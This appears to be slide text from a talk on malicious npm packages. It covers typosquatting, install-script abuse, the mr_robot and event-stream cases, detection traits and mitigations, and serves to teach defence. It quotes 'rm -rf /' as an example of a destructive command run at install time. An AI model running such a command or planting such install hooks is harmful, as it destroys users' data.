2. What is npm?
● Package Manager for JavaScript programming language
● It aims to solve problems by creating small modules
● Using modules together for better efficiency(Similar to libraries)
● Used by angular, react ,ionic for distribution
4. Dependency graph
of top 100 npm packages
● What seems to be the
strength of such huge
community also happens to
be its weakness.(npm,
rubygems)
● Difficult in maintaining
● Code cleaning is a problem
5. Most of the code is not your code
create-react-app downloads 1839 files nearly size of 531M
6. For the bravehearts that look inside this is what they found
● Npx bitandbang
● yummy.js -Express (deprecaated)
● Node.js - Babel (deprecated)
8. What makes modules malicious?
● Upon requiring it, the module could gather information from your system or network,
and send it out to a 3rd party.
● Upon installing it, the module could have an install phase, where it will run destructive
commands, for example: rm -rf /
10. Attack vectors
Attack surface- Basically any open repository
Attack Methods
● Typosquatting
● Social-engineering-Locate a package that others rely on and simply ask them to take
over the project
● Abuse the ability for npm to run preinstall or postinstall scripts --ignore-scripts
● The malicious packages were listed to "depend" on the legitimate
counterparts, so the correct package would eventually be installed
14. Case of mr_robot
● shrugging-logging package claims that it adds the ASCII shrug, ¯_(ツ)_/¯, to
log messages.
But, it also includes a nasty postinstall script which adds the package's
author, mr-robot, to every npm package owned by the person who ran
npm install.
Sourcecode
15. Case study
● Event-stream (November 2018)
● electron-native-notify(June 2019)
● left-pad(Eleven lines of destruction)
17. How can we detect?
Look for following traits
● Obfuscation
● Reading of sensitive information
● Exfiltration of information
● Remote code execution
● Typosquatting(red flag)
18. How can we mitigate?
● Don’t copy&paste anything blindly. (like this sentence right here)
● Npm has new rules for naming packages.
● Use integrated npm audit
● Snyk.io or greenkeeper.io
● Use better passwords
● Npm shrinkwrap command
● Run in docker
In another study published earlier this year, a security researcher was able to gain direct access to 14% of all npm packages (and indirect access to 54% of packages) by either brute-forcing weak credentials or by reusing passwords discovered from other unrelated breaches, leading to mass password resets across npm.
The impact of hijacked or malicious packages is compounded by how npm is structured. Npm encourages making small packages that aim to solve a single problem. This leads to a network of small packages that each depend on many other packages. In the case of the credential compromise research, the author was able to gain access to some of the most highly depended-upon packages, giving them a much wider reach than they would have otherwise had.
This code could harvest credentials or install back doors and trojan horses.
https://blog.usejournal.com/12-strange-things-that-can-happen-after-installing-an-npm-package-45de7fbf39f0
This activity of finding undetected malicious packages has further confirmed our suspicions of the existence of harmful libraries out in the open, and is only the beginning of our quest to efficiently overturn all stones to reduce potential threats. To do this, we intend to perform more regular, automated, and thorough audits on public packages, then generalize these techniques for other package managers like RubyGems.
